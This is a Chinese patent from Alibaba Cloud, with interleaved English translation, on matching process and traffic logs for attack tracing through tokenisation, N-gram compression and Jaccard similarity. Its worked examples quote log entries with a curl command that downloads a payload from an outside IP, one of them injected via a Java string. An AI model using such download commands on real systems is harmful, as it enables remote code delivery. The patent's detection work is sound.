CN115412274A

CN115412274A - Attack tracing method and related data processing and association display method and device

Info

Publication number: CN115412274A
Application number: CN202210425983.8A
Authority: CN
Inventors: 蒋昊瑾
Original assignee: Alibaba Cloud Computing Ltd
Current assignee: Alibaba Cloud Computing Ltd
Priority date: 2022-04-21
Filing date: 2022-04-21
Publication date: 2022-11-29

Abstract

The invention discloses an attack tracing method and a related data processing and association display method and device. The processing method of the attack tracing data comprises the following steps: converting at least two different types of attack tracing data generated in the same time period into at least two corresponding texts respectively; comparing the texts corresponding to the at least two parts to determine the similarity between the texts corresponding to the at least two parts; and determining whether the at least two different types of attack tracing data are matched or not according to the similarity. Compared with the prior art, the method adopts a regular expression matching mode, simplifies the matching process, can realize automatic association of mass data, improves the matching efficiency of the attack tracing data, and provides support for faster attack tracing.

Description

Attack source tracing method, related data processing, associated display method and device

技术领域technical field

本发明涉及网络安全技术领域，特别涉及一种攻击溯源方法及相关数据处理、关联展示方法及装置。The present invention relates to the technical field of network security, in particular to an attack source tracing method, related data processing, and associated display method and device.

背景技术Background technique

攻击溯源是网络安全事件中事后响应的重要方法之一，即通过对攻击溯源相关的数据例如用户受威胁资产与告警日志、网络流量日志、进程日志、恶意文件日志、威胁情报等进行关联分析，形成攻击溯源图谱来还原攻击者的攻击路径和攻击手法，从而为用户进行漏洞修复、真实性核实、根因分析、影响评估等提供高可解释性依据。如何将海量告警与每个类型的安全日志在长时间跨度下进行快速、准确的关联挖掘是网络攻击溯源的重要挑战。Attack source tracing is one of the important methods for post-event response in network security incidents, that is, by correlating and analyzing data related to attack source tracing, such as user threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, and threat intelligence, An attack traceability map is formed to restore the attacker's attack path and attack method, thereby providing a highly interpretable basis for users to perform vulnerability repair, authenticity verification, root cause analysis, and impact assessment. How to quickly and accurately associate massive alarms with each type of security log over a long period of time is an important challenge for network attack source tracing.

在攻击溯源图谱的构建中，可以多种日志和/或情报信息间进行关联挖掘，比如将网络流量日志与进程日志进行关联挖掘，是实现主机内事实数据与网络层数据溯源能力的关键。目前一般的网络攻击溯源做法是基于安全规则来实现的，即将相同时间窗口内的进程日志和网络流量两份日志，直接利用正则表达式的方式来明文匹配进程日志数据中的cmd_line字段或uri字段和流量日志中的post_data字段。这种方法中匹配规则需要安全工程师预先一一定义，无法自动化地进行匹配，规则会越写越多，大数据量的情况下，规则匹配很费力；同时复杂的正则表达式计算在海量数据情形下非常耗时；只能针对特有日志的特有字段进行匹配，无法扩展到其他场景；规则过滤会存在很多关联性不强的边，导致匹配结果不太准确。In the construction of the attack traceability map, it is possible to carry out correlation mining between various logs and/or intelligence information, such as the correlation mining of network traffic logs and process logs, which is the key to realizing the traceability of factual data in the host and data at the network layer. At present, the general method of network attack source tracing is implemented based on security rules, that is, the two logs of process logs and network traffic in the same time window directly use regular expressions to match the cmd_line field or uri field in the process log data in plain text and the post_data field in the traffic log. In this method, the matching rules need to be defined one by one by the security engineer in advance, and the matching cannot be performed automatically, and more and more rules will be written. In the case of a large amount of data, rule matching is very laborious; at the same time, complex regular expressions are calculated in the case of massive data. It is very time-consuming; it can only be matched against specific fields of specific logs, and cannot be extended to other scenarios; there will be many edges with weak correlation in rule filtering, resulting in inaccurate matching results.

发明内容Contents of the invention

鉴于上述问题，提出了本发明以便提供一种克服上述问题或者至少部分地解决上述问题的一种攻击溯源数据处理方法、攻击溯源方法和攻击信息关联展示方法及装置。In view of the above problems, the present invention is proposed to provide an attack traceability data processing method, an attack traceability method, and an attack information correlation display method and device that overcome the above problems or at least partially solve the above problems.

第一方面，本发明实施例提供一种攻击溯源数据的处理方法，包括：In the first aspect, the embodiment of the present invention provides a method for processing attack traceability data, including:

将同一时间段内产生的至少两份不同类别的攻击溯源数据，分别转换成至少两份对应的文本；Convert at least two different types of attack traceability data generated within the same period of time into at least two corresponding texts;

将所述至少两份对应的文本进行比较，确定所述至少两份对应的文本之间的相似度；comparing the at least two corresponding texts to determine the degree of similarity between the at least two corresponding texts;

根据所述相似度，确定所述至少两份不同类别的攻击溯源数据之间是否匹配。According to the similarity, it is determined whether the at least two pieces of attack source tracing data of different categories match.

在一个实施例中，将同一时间段内产生的至少两份不同类别的攻击溯源数据，分别转换成至少两份对应的文本之前，还包括：In one embodiment, before at least two pieces of attack source tracing data of different types generated in the same time period are converted into at least two corresponding texts, the following steps are also included:

根据预设时间窗的长度，从所述至少两份不同类别的攻击溯源数据中选取位于同一时间窗内的攻击溯源数据。According to the length of the preset time window, the attack source tracing data within the same time window is selected from the at least two different types of attack source tracing data.

在一个实施例中，将至少两份对应的文本进行比较，确定至少两份对应的文本之间的相似度，包括：In one embodiment, at least two corresponding texts are compared to determine the similarity between at least two corresponding texts, including:

将所述至少两份对应的文本按照预设的停词规则进行分词，分别生成包含多个词语的词向量；Segmenting the at least two corresponding texts according to preset stop word rules to generate word vectors containing multiple words respectively;

计算词向量之间的相似度，将所述词向量之间的相似度作为所述至少两份文本之间的相似度。Calculate the similarity between the word vectors, and use the similarity between the word vectors as the similarity between the at least two texts.

在一个实施例中，计算词向量之间的相似度，具体包括：In one embodiment, calculating the similarity between word vectors specifically includes:

对词向量分别进行压缩，得到压缩后的词向量；Compress the word vectors separately to obtain compressed word vectors;

计算压缩后的词向量之间的杰卡德相似度。Computes the Jaccard similarity between compressed word vectors.

在一个实施例中，对词向量进行压缩，包括：使用预设的N-Gram的切分方式，对词向量中的词语进行重新切分，得到压缩后的词向量。In one embodiment, compressing the word vector includes: using a preset N-Gram segmentation method to re-segment the words in the word vector to obtain compressed word vectors.

在一个实施例中，计算词向量之间的相似度，包括：In one embodiment, calculating the similarity between word vectors includes:

计算词向量之间不连续匹配字符字串的长度，将所述不连续匹配字符串的长度作为所述词向量之间的相似度。Calculate the length of discontinuous matching character strings between the word vectors, and use the length of the discontinuous matching character strings as the similarity between the word vectors.

第二方面，本发明实施例提供一种攻击溯源的方法，包括：In the second aspect, the embodiment of the present invention provides a method for attack source tracing, including:

采集同一时间段内产生的至少两份不同类别的攻击溯源数据；Collect at least two different types of attack traceability data generated within the same period of time;

判断所述至少两份不同类别的攻击溯源数据之间是否匹配；judging whether the at least two pieces of attack source tracing data of different categories match;

若匹配，则确定所述两份不同类别的攻击溯源数据之间存在关联；If they match, it is determined that there is a relationship between the two pieces of attack source tracing data of different categories;

所述判断所述至少两份不同类别的攻击溯源数据之间是否匹配的步骤，是通过如前述的攻击溯源数据的处理方法实现的。The step of judging whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned processing method of attack traceability data.

第三方面，本发明实施例提供一种攻击信息的关联展示方法，包括：In a third aspect, an embodiment of the present invention provides a method for correlating and displaying attack information, including:

确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据，是否存在关联；Determine whether at least two pieces of attack traceability data of different types generated in the same time period are related;

若存在，则在攻击溯源图谱上通过预设的关联方式展示所述不同类别的攻击溯源数据的关联关系；If it exists, display the relationship between the different types of attack source data on the attack source graph through a preset association method;

所述确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据是否存在关联是通过如前述定位攻击溯源的方法实现的。The determination of whether at least two pieces of attack source tracing data of different types generated within the same time period are related is realized by the method of locating the source of attack as described above.

第四方面，本发明实施例提供一种攻击溯源数据的处理装置，包括：In the fourth aspect, the embodiment of the present invention provides a processing device for attack traceability data, including:

转换模块，用于将同一时间段内产生的至少两份不同类别的攻击溯源数据，分别转换成至少两份对应的文本；The conversion module is used to convert at least two different types of attack traceability data generated in the same period of time into at least two corresponding texts;

比较模块，用于将至少两份对应的文本进行比较，确定至少两份对应的文本之间的相似度；A comparison module, configured to compare at least two corresponding texts and determine the similarity between at least two corresponding texts;

匹配模块，用于根据所述相似度，确定所述至少两份不同类别的攻击溯源数据之间是否匹配。A matching module, configured to determine whether the at least two pieces of attack source tracing data of different categories match according to the similarity.

第五方面，本发明实施例提供一种攻击溯源的装置，包括：In the fifth aspect, the embodiment of the present invention provides an attack source tracing device, including:

采集模块，用于采集同一时间段内产生的至少两份不同类别的攻击溯源数据；The collection module is used to collect at least two different types of attack traceability data generated within the same time period;

判断模块，用于判断所述至少两份不同类别的攻击溯源数据之间是否匹配；A judging module, configured to judge whether the at least two pieces of attack source tracing data of different categories match;

关联模块，用于若判断模块判断为匹配时，确定所述两份不同类别的攻击溯源数据之间存在关联；An association module, configured to determine that there is an association between the two pieces of attack source tracing data of different categories if the judging module judges that they match;

所述判断所述至少两份不同类别的攻击溯源数据之间是否匹配，是通过如前述的攻击溯源数据的处理方法实现的。The judging whether the at least two pieces of attack traceability data of different types match is realized through the aforementioned processing method of attack traceability data.

第六方面，本发明实施例提供一种攻击信息的关联展示装置，包括：In a sixth aspect, an embodiment of the present invention provides an attack information related display device, including:

确定模块，用于确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据，是否存在关联；The determination module is used to determine whether at least two pieces of attack source tracing data of different categories generated within the same time period are related;

关联展示模块，用于当所述确定模块确定存在关联，则在攻击溯源图上通过预设的关联方式展示所述不同类别的攻击溯源数据的关联关系；The association display module is used to display the association relationship of the different types of attack source data on the attack source diagram through a preset association method when the determination module determines that there is an association;

所述确定在同一个时间段内产生的至少两份不同类别的攻击溯源数据是否存在关联是通过如前述的攻击信息的溯源方法实现的。The determination of whether at least two pieces of attack traceability data of different types generated within the same time period are related is realized by the above-mentioned attack information traceability method.

第七方面，本发明实施例提供一种服务器，包括：存储器、处理器及存储于存储器上并可在处理器上运行的计算机程序，所述处理器执行所述程序时实现如前述攻击溯源数据的处理方法，或如前述的攻击溯源的方法，或如前述的攻击信息的关联展示方法。In the seventh aspect, the embodiment of the present invention provides a server, including: a memory, a processor, and a computer program stored on the memory and operable on the processor. When the processor executes the program, it implements the aforementioned attack source tracing data The processing method, or the method of tracing the source of the attack as described above, or the method of correlating and displaying the attack information as described above.

第八方面，本发明实施例提供一种计算机可读存储介质，所述计算机可读存储介质存储有计算机程序，所述计算机程序被处理器执行时实现如前述攻击溯源数据的处理方法，或如前述的攻击溯源的方法，或如前述的攻击信息的关联展示方法。In an eighth aspect, an embodiment of the present invention provides a computer-readable storage medium, the computer-readable storage medium stores a computer program, and when the computer program is executed by a processor, it implements the processing method of attack traceability data as described above, or as The aforementioned method of attack source tracing, or the aforementioned method of correlating and displaying attack information.

第九方面，本发明实施例提供一种计算机程序产品，所述计算机程序产品包括计算机程序，所述计算机程序被处理器执行时实现如前述攻击溯源数据的处理方法，或如前述的攻击溯源的方法，或如前述的攻击信息的关联展示方法。In the ninth aspect, an embodiment of the present invention provides a computer program product, the computer program product includes a computer program, and when the computer program is executed by a processor, it implements the aforementioned attack source tracing data processing method, or the aforementioned attack source tracing method. method, or the associated display method of attack information as described above.

本发明实施例提供的上述技术方案的有益效果至少包括：The beneficial effects of the above-mentioned technical solutions provided by the embodiments of the present invention at least include:

本发明实施例基于文本的相似性的方式来挖掘攻击溯源数据之间关联性，将同一时间段内产生的至少两份不同类别的攻击溯源数据，转换成对应的文本，然后比较文本之间的相似度，通过至少两个文本之间的相似度，确定至少两份不同类别的攻击溯源数据之间是否匹配，将衡量同一时间范围内日志的关联性，转换成比较两个文本相似度，或者共现词有多少的问题，较现有技术采用正则表达式匹配的方式，简化了匹配的过程，可实现海量数据的自动化关联，提高了攻击溯源数据的匹配效率，为更快地进行攻击溯源提供了支撑。The embodiment of the present invention mines the correlation between attack traceability data based on text similarity, converts at least two pieces of attack traceability data of different types generated in the same time period into corresponding texts, and then compares the texts Similarity, through the similarity between at least two texts, determine whether there is a match between at least two different types of attack traceability data, and convert the correlation of logs in the same time range into comparing the similarity of two texts, or The problem of how many co-occurring words is compared with the existing technology uses regular expression matching, which simplifies the matching process, realizes the automatic correlation of massive data, improves the matching efficiency of attack traceability data, and provides faster attack traceability Provided support.

本发明实施例还通过对攻击溯源数据转换的文本进行分词得到词向量，并对词向量进行压缩，通过计算压缩后的词向量的杰拉德相似度，来判断攻击溯源数据之间是否存在匹配关系，在运算量、运算时间、运算复杂度和内存占用等方面进行了均衡考量，在得到准确匹配结果的同时，也保证了攻击溯源的时效性，为及时进行安全预警、漏洞修复、攻击原因分析、影响评估等后续操作提供了有利的支撑。In the embodiment of the present invention, the word vector is obtained by segmenting the text converted from the attack traceability data, and the word vector is compressed, and by calculating the Gerrard similarity of the compressed word vector, it is judged whether there is a match between the attack traceability data Balanced considerations have been made in terms of calculation amount, calculation time, calculation complexity and memory usage. While obtaining accurate matching results, it also ensures the timeliness of attack source tracing. In order to provide timely security warnings, vulnerability repairs, and attack causes Follow-up operations such as analysis and impact assessment provide favorable support.

本发明实施例提供的攻击信息关联展示方法，将匹配的不同类型的攻击溯源数据以可视化的方式在攻击溯源图谱中展示出来，更有利于用户更直观地、快速地利用攻击溯源图谱识别攻击路径、攻击手法等信息。The attack information association display method provided by the embodiment of the present invention displays the matching attack traceability data of different types in the attack traceability map in a visual manner, which is more conducive to users to use the attack traceability map to identify the attack path more intuitively and quickly , attack methods and other information.

本发明的其它特征和优点将在随后的说明书中阐述，并且，部分地从说明书中变得显而易见，或者通过实施本发明而了解。本发明的目的和其他优点可通过在所写的说明书、权利要求书、以及附图中所特别指出的结构来实现和获得。Additional features and advantages of the invention will be set forth in the description which follows, and in part will be apparent from the description, or may be learned by practice of the invention. The objectives and other advantages of the invention may be realized and attained by the structure particularly pointed out in the written description and claims hereof as well as the appended drawings.

下面通过附图和实施例，对本发明的技术方案做进一步的详细描述。The technical solutions of the present invention will be described in further detail below with reference to the accompanying drawings and embodiments.

附图说明Description of drawings

附图用来提供对本发明的进一步理解，并且构成说明书的一部分，与本发明的实施例一起用于解释本发明，并不构成对本发明的限制。在附图中：The accompanying drawings are used to provide a further understanding of the present invention, and constitute a part of the description, and are used together with the embodiments of the present invention to explain the present invention, and do not constitute a limitation to the present invention. In the attached picture:

图1为本发明实施例攻击溯源数据的处理方法的流程图；FIG. 1 is a flowchart of a processing method for attack traceability data according to an embodiment of the present invention;

图2为本发明实施例提供的进程日志cmd_line字段与流量日志的post_data字段进行匹配的实例的流程图；Fig. 2 is the flow chart of the example that the process log cmd_line field and the post_data field of flow log are matched according to the embodiment of the present invention;

图3为本发明实施例提供的攻击溯源的方法的流程图；FIG. 3 is a flow chart of a method for attack source tracing provided by an embodiment of the present invention;

图4为本发明实施例提供的攻击信息的关联展示方法的流程图；FIG. 4 is a flowchart of a method for correlating and displaying attack information provided by an embodiment of the present invention;

图5为本发明实施例提供的攻击溯源图谱展示界面的例子的示意图；5 is a schematic diagram of an example of an attack traceability map display interface provided by an embodiment of the present invention;

图6为本发明实施例提供的攻击溯源数据的处理装置的结构框图；FIG. 6 is a structural block diagram of a processing device for attack traceability data provided by an embodiment of the present invention;

图7为本发明实施例提供的攻击溯源的装置的结构框图；FIG. 7 is a structural block diagram of an attack source tracing device provided by an embodiment of the present invention;

图8为本发明实施例提供的攻击信息的关联展示装置的结构框图。FIG. 8 is a structural block diagram of an apparatus for displaying associations of attack information provided by an embodiment of the present invention.

具体实施方式Detailed ways

下面将参照附图更详细地描述本公开的示例性实施例。虽然附图中显示了本公开的示例性实施例，然而应当理解，可以以各种形式实现本公开而不应被这里阐述的实施例所限制。相反，提供这些实施例是为了能够更透彻地理解本公开，并且能够将本公开的范围完整的传达给本领域的技术人员。Exemplary embodiments of the present disclosure will be described in more detail below with reference to the accompanying drawings. Although exemplary embodiments of the present disclosure are shown in the drawings, it should be understood that the present disclosure may be embodied in various forms and should not be limited by the embodiments set forth herein. Rather, these embodiments are provided for more thorough understanding of the present disclosure and to fully convey the scope of the present disclosure to those skilled in the art.

为了解决现有攻击溯源中利用正则的方式明文匹配进程日志中的字段存在的问题，本发明实施例提供了一种攻击溯源数据的处理方法、攻击的溯源方法和攻击信息的关联展示方法。In order to solve the existing problem of matching plaintext fields in process logs in a regular way in existing attack source tracing, embodiments of the present invention provide a method for processing attack source tracing data, an attack source tracing method, and an associated display method for attack information.

下面首先对本发明实施例提供的攻击溯源数据的处理方法的流程图进行详细的说明。The flowchart of the method for processing attack traceability data provided by the embodiment of the present invention will firstly be described in detail below.

本发明实施例提供的攻击溯源数据的处理方法，参照图1所示，包括：The method for processing attack traceability data provided by the embodiment of the present invention, as shown in FIG. 1 , includes:

S11、将同一时间段内产生的至少两份不同类别的攻击溯源数据，分别转换成至少两份对应的文本；S11. Convert at least two pieces of attack traceability data of different types generated in the same time period into at least two corresponding texts;

S12、将至少两份对应的文本进行比较，确定至少两份对应的文本之间的相似度；S12. Comparing at least two corresponding texts to determine the similarity between at least two corresponding texts;

S13、根据相似度，确定至少两份不同类别的攻击溯源数据之间是否匹配。S13. According to the similarity, determine whether at least two pieces of attack source tracing data of different categories match.

在本发明实施例中，上述不同类别的攻击溯源数据，包括但不限于：用户受威胁资产与告警日志、网络流量日志、进程日志、恶意文件日志、威胁情报等等中的一类或多类信息。In the embodiment of the present invention, the above-mentioned different types of attack traceability data include, but are not limited to: one or more types of user threatened assets and alarm logs, network traffic logs, process logs, malicious file logs, threat intelligence, etc. information.

通常，为了实现攻击溯源，需要对同一时间段内发生的攻击溯源数据之间关联性进行分析，为了实现同一时间段内的攻击溯源数据的关联匹配，在本发明实施例中，使用时间窗的方式，根据预设时间窗的长度，从至少两份不同类别的攻击溯源数据中选取位于同一时间窗内的攻击溯源数据进行后续的匹配流程。Usually, in order to realize attack source tracing, it is necessary to analyze the correlation between the attack source tracing data that occurred in the same time period. In this method, according to the length of the preset time window, the attack source tracing data in the same time window is selected from at least two different types of attack source tracing data for subsequent matching process.

对于攻击溯源数据来说，是源源不断地产生地，为了实现攻击溯源的时效性，本发明实施例提供的攻击溯源数据的处理方法，可以持续不断地进行，每次分析时，使用滑动时间窗，在输入的不同类型的攻击溯源数据(实时产生的)上分别选定需要比较的数据的范围。For the attack traceability data, it is continuously generated. In order to realize the timeliness of the attack traceability, the processing method of the attack traceability data provided by the embodiment of the present invention can be carried out continuously. For each analysis, a sliding time window is used. Select the scope of the data to be compared on the input of different types of attack traceability data (generated in real time).

选定需要比较的数据的范围之后，根据分析的结果，确定两种或两种以上的攻击溯源数据是否匹配，它们之间是否存在关联，如果存在关联，则立刻通过各种方式通知用户(例如在溯源图谱丧关联显示出来)的方式，这样，可以保证攻击溯源分析的时效性。After selecting the range of data to be compared, according to the analysis results, determine whether two or more attack traceability data match and whether there is a relationship between them, and if there is a relationship, immediately notify the user through various methods (such as In this way, the timeliness of attack source traceability analysis can be guaranteed.

滑动时间窗的长度，一定程度上决定了需要进行匹配的攻击溯源数据的长度，数据过短，可能导致分析的结果不准确，数据过长，又会延长分析计算的时间，因此，可根据实际计算能力、时效性要求合理选择时间长度，以达到准确匹配同时满足攻击溯源的时效性的要求。The length of the sliding time window determines to a certain extent the length of the attack traceability data that needs to be matched. If the data is too short, the analysis results may be inaccurate, and if the data is too long, the analysis and calculation time will be prolonged. Therefore, according to the actual Computing power and timeliness require a reasonable selection of the length of time to achieve accurate matching and meet the timeliness requirements of attack source tracing.

在一个实施例中，上述步骤S11中，可以将两种或两种以上不同种类的日志数据进行数据清洗，必要时进行数据解码等操作，分别将两种或两种以上不同种类的日志数据转换成对应的文本。In one embodiment, in the above step S11, two or more different types of log data can be cleaned, and if necessary, data decoding and other operations can be performed to convert two or more different types of log data into the corresponding text.

在一个实施例中，上述步骤S12中，为了方便文本的匹配，可以将文本进一步地生成词向量，通过计算词向量之间的相似度，得到两份文本之间的相似度。将文本的相似度转变成为词向量之间的相似性。In one embodiment, in step S12 above, in order to facilitate text matching, the text can be further generated into word vectors, and the similarity between two texts can be obtained by calculating the similarity between word vectors. Transform the similarity of text into the similarity between word vectors.

可以采用下述方法来得到词向量：将上述至少两份对应的文本按照预设的停词规则分别进行分词，分别生成包含多个词语的词向量；The following method can be used to obtain word vectors: the above-mentioned at least two corresponding texts are respectively segmented according to the preset stop word rules, and word vectors containing multiple words are respectively generated;

停词规则可以是按照预设的分隔符(比如”)或者空格来分割词语，比如将”中包含的字符提取出来作为一个词语等，分词的具体方式可参照现有技术，在此不再详述。The stop word rule can be to divide words according to preset separators (such as ") or spaces, such as extracting the characters contained in " as a word, etc. The specific method of word segmentation can refer to the prior art, which will not be detailed here. stated.

比如进程日志中cmd_line字段“curl-O http://213.202.230.103/syn”根据停词分割可得到词向量s1＝[curl,O,http://213.202.230.103/syn]。For example, the cmd_line field "curl-O http://213.202.230.103/syn" in the process log can obtain the word vector s1=[curl, O, http://213.202.230.103/syn] according to the stop word segmentation.

根据上述停词分割的原则，提取转换后文本包含的各个字符，形成词向量。According to the principle of stop word segmentation above, each character contained in the converted text is extracted to form a word vector.

考虑到转换后的文本中包含的字符串长度可能非常长，如果直接对词向量进行计算可能会造成计算量过大，计算时长过长的问题，本发明实施例中，可对词向量进行压缩。Considering that the length of the character string contained in the converted text may be very long, if the word vector is directly calculated, the calculation amount may be too large and the calculation time is too long. In the embodiment of the present invention, the word vector can be compressed .

在一个实施例中，本发明可使用预设的N-Gram的切分方式，对词向量中的词语进行重新切分，得到压缩后的词向量。In one embodiment, the present invention can use the preset N-Gram segmentation method to re-segment the words in the word vector to obtain compressed word vectors.

N-Gram指的是一类使用相同文本切分方式的语言模型，即使用多阶枚举的方式生成多个片段(Gram)，切分方式如下：使用一个长度为N的窗口，从左到右、逐字符滑过文本；每一步，会框到一个字符串，就是一个Gram；文本里所有的Gram就是该文本的切分结果。N-Gram refers to a language model that uses the same text segmentation method, that is, multiple fragments (Gram) are generated by multi-level enumeration. The segmentation method is as follows: use a window of length N, from left to Right, slide over the text character by character; each step will frame a string, which is a Gram; all the Grams in the text are the segmentation results of the text.

枚举时，可以预先确定枚举的阶数(N即枚举的阶数)，然后按照预设的阶数逐一进行枚举，得到对应的切分的结果。When enumerating, the order of enumeration can be determined in advance (N is the order of enumeration), and then enumerate one by one according to the preset order to obtain the corresponding segmentation results.

以cmd_line字段“curl–O http://213.202.230.103/syn”举例，其切分得到的词向量的结果如下表：Taking the cmd_line field "curl–O http://213.202.230.103/syn" as an example, the results of word vectors obtained by segmentation are as follows:

表1Table 1

从上面的例子可以看出，如N值过小，则包含的片段的数量过多，单个片段的长度过小，计算量比较大，耗时较长，匹配的准确性较低，而若N的值过大，则也会存在内存消耗也越大，特征稀疏的问题，匹配的准确性同样也会降低，因此，可根据实际情况，选取合适的N的值，以实现计算量、计算耗时、内存消耗、准确性等方面的平衡。From the above example, it can be seen that if the value of N is too small, the number of fragments contained is too large, the length of a single fragment is too small, the amount of calculation is relatively large, it takes a long time, and the matching accuracy is low, and if N If the value of N is too large, there will also be problems of greater memory consumption and sparse features, and the accuracy of matching will also be reduced. Therefore, an appropriate value of N can be selected according to the actual situation to realize the calculation amount and calculation consumption. Balance between time, memory consumption, accuracy, etc.

在一个实施例中，可采用经上述词向量压缩后得到的词向量，计算压缩后的词分量之间的杰卡德相似度，作为最终计算结果。In one embodiment, the word vectors obtained after the above-mentioned word vector compression can be used to calculate the Jaccard similarity between the compressed word components as the final calculation result.

当然，本发明实施例并不限于采用杰卡德相似度来实现词向量之间相似度的计算，其他可实现相似度计算的方式皆可。Of course, the embodiment of the present invention is not limited to using the Jaccard similarity to realize the calculation of the similarity between word vectors, and other methods that can realize the similarity calculation are all available.

杰卡德(Jaccard)相似度，相似性系数主要用于计算符号度量或布尔值度量的样本间的相似度。若样本间的特征属性由符号和布尔值标识，无法衡量差异具体值的大小，只能获得“是否相同”这样一种结果，而Jaccard相似度关心的是样本间共同具有的特征。Jaccard similarity, the similarity coefficient is mainly used to calculate the similarity between samples measured by symbols or Boolean values. If the feature attributes between samples are identified by symbols and Boolean values, it is impossible to measure the size of the specific value of the difference, and only the result of "whether they are the same" can be obtained, while the Jaccard similarity is concerned with the common characteristics between samples.

本发明实施例中，之所以采用杰卡德相似度来评价词向量相似度的原因包括：1)杰卡德相似性计算简单，时间复杂度低；(2)其相似性结果受到字段长度影响，相对较长的字段其结果更趋于准确；这与本发明实施例中相同词个数一样的情况下，攻击溯源数据的长度越大则相似度值越具有可行性(也就是匹配的结果越准确)的特点吻合。In the embodiment of the present invention, the reasons why Jaccard similarity is used to evaluate word vector similarity include: 1) Jaccard similarity calculation is simple and time complexity is low; (2) the similarity result is affected by the field length , the result of a relatively long field tends to be more accurate; this is the same as the number of words in the embodiment of the present invention, the greater the length of the attack traceability data, the more feasible the similarity value is (that is, the matching The more accurate the result), the characteristics match.

杰卡德的一般表达式如下：The general expression of Jaccard is as follows:

假设两个集合A和B，那么二者的杰卡德相似度为：Assuming two sets A and B, then the Jaccard similarity between the two is:

上式中，len(A and B)是A与B交集的长度，len(A or B)是A和B并集的长度。In the above formula, len(A and B) is the length of the intersection of A and B, and len(A or B) is the length of the union of A and B.

杰卡德相似度，即集合间共现词的比例。Jaccard similarity, which is the proportion of co-occurring words between sets.

结合前述词向量压缩的步骤，那么在进行词向量压缩的步骤之后，本发明实施例可使用下述公式来计算不同压缩后词向量之间的相似度值：In combination with the aforementioned steps of word vector compression, after the step of word vector compression, the embodiment of the present invention can use the following formula to calculate the similarity value between different compressed word vectors:

上述S1′和S2′是待计算相似度的两个压缩后的词向量，len(S1′)和len(S2′)分别为压缩后的词向量S1′和S2′的长度。The above S1' and S2' are two compressed word vectors for which the similarity is to be calculated, and len(S1') and len(S2') are the lengths of the compressed word vectors S1' and S2' respectively.

如果存在需要计算相似度的词向量(或者压缩后的词向量)的数量为多个(大于2个)，则可以采用两两进行匹配的方式，分别计算两个词向量(或者压缩后的词向量)的杰卡德相似度值，从而确定它们之间是否匹配。If there are multiple word vectors (or compressed word vectors) that need to be calculated for similarity (more than 2), you can use pairwise matching to calculate two word vectors (or compressed word vectors) Vector) Jaccard similarity value to determine whether they match.

计算出杰卡德相似度值后，可将其与预设的相似度阈值进行比较，若大于预设的相似度阈值，则确定词向量所对应的攻击溯源数据之间存在匹配关系。After the Jaccard similarity value is calculated, it can be compared with the preset similarity threshold. If it is greater than the preset similarity threshold, it is determined that there is a matching relationship between the attack traceability data corresponding to the word vector.

若不采用杰卡德相似度计算的方式，则还可以采用基于举动态规划的共现词相似性比较的简化算法。If the Jaccard similarity calculation method is not used, a simplified algorithm based on dynamic programming-based co-occurrence word similarity comparison can also be used.

该简化算法，将词向量进行停词分割后得到的各个词语捆绑作为一个字符，令s1〞＝x＝'[curl O http://213.202.230.103/syn]',xi为x的第i项，如x0＝'curl'。This simplified algorithm binds each word obtained after the word vector is divided into stop words as a character, so that s1"=x='[curl O http://213.202.230.103/syn]', xi is the i-th item of x , such as x0='curl'.

同理，s2〞＝y＝'...0022cur lOhttp://213.202.230.103/syn,...'，yj为y的第j项。Similarly, s2"=y='...0022cur lOhttp://213.202.230.103/syn,...', yj is the jth item of y.

构建矩阵C，该矩阵为i行j列，需要计算字符串x和字符串y的不连续匹配字符子串的长度，动态规划算式为：To construct a matrix C, the matrix has i rows and j columns. It is necessary to calculate the length of the discontinuous matching character substrings of string x and string y. The dynamic programming formula is:

C[i][j]的值长度越长，则代表匹配到的相似性文本越长，则词向量之间的相似度越大。The longer the value length of C[i][j], the longer the matched similarity text, and the greater the similarity between word vectors.

简化计算可以直接看矩阵中i和j取最大值的那个元素的值，是否大于预设的阈值，如果是，则确定词向量之间匹配。To simplify the calculation, you can directly check whether the value of the element with the maximum value of i and j in the matrix is greater than the preset threshold, and if so, determine the match between the word vectors.

下面以进程日志cmd_line字段与流量日志的post_data字段进行比较为一个实例，说明本发明实施例提供的上述攻击溯源数据的处理方法。The following uses the comparison between the cmd_line field of the process log and the post_data field of the traffic log as an example to illustrate the processing method for the above-mentioned attack source tracing data provided by the embodiment of the present invention.

该实例的处理过程，参照图2所示，包括下述步骤：The processing procedure of this example, with reference to shown in Figure 2, comprises the following steps:

步骤S21、确定滑动窗口的长度，即时间长度范围，输入进程日志数据和网络流量数据，通过设计时间窗口的长度，从输入的进程日志cmd_line字段与流量日志的post_data字段中选定需要比较的数据范围，时间窗口的长度限定在180ms：Step S21, determine the length of the sliding window, that is, the time length range, input process log data and network flow data, and select the data to be compared from the input process log cmd_line field and the post_data field of the flow log by designing the length of the time window range, the length of the time window is limited to 180ms:

步骤S22、对选定的数据进行数据清洗与词向量构建。将post_data数据进行url解码(url decode)的处理，并将需要比较的cmd_line字段和post_data字段按照适当的停词规则进行分割。例如采用如下的正则表达式进行停词分割：Step S22, performing data cleaning and word vector construction on the selected data. The post_data data is processed by url decoding (url decode), and the cmd_line field and post_data field to be compared are divided according to appropriate stop word rules. For example, the following regular expressions are used for stop word segmentation:

[x for x in re.sub(r'[^A-Za-z0-9_.]',”,str1).split(”)if x！＝”][x for x in re.sub(r'[^A-Za-z0-9_.]',",str1).split(")if x! ="]

通过停词分割，就可以将一个文本按序分成一系列“词语”例如cmd_line字段“curl-Ohttp://213.202.230.103/syn”根据停词分割规则进行分词后，可得到词向量s1＝[curl,O,http://213.202.230.103/syn]；post_data字段“...+var+cmd+＝+new+java.lang.String(\u0022cd+/tmp；curl+O+http://213.202.230.103/syn...”根据停词分割规则进行分词后，可得到词向量s2＝[...,0022,curl,O,http://213.202.230.103/syn,...]。Through stop word segmentation, a text can be divided into a series of "words" in order, for example, the cmd_line field "curl-Ohttp://213.202.230.103/syn" After word segmentation according to the stop word segmentation rules, the word vector s1=[ curl,O,http://213.202.230.103/syn]; post_data field "...+var+cmd+＝+new+java.lang.String(\u0022cd+/tmp;curl+O+http://213.202. 230.103/syn..." After performing word segmentation according to the stop word segmentation rule, the word vector s2=[...,0022,curl,O,http://213.202.230.103/syn,...] can be obtained.

步骤S23、对词向量进行压缩；Step S23, compressing the word vector;

使用2-gram的方式对s1和s2进行压缩，分别得到压缩后的词向量s1′和s2′。Use 2-gram to compress s1 and s2 to obtain compressed word vectors s1' and s2' respectively.

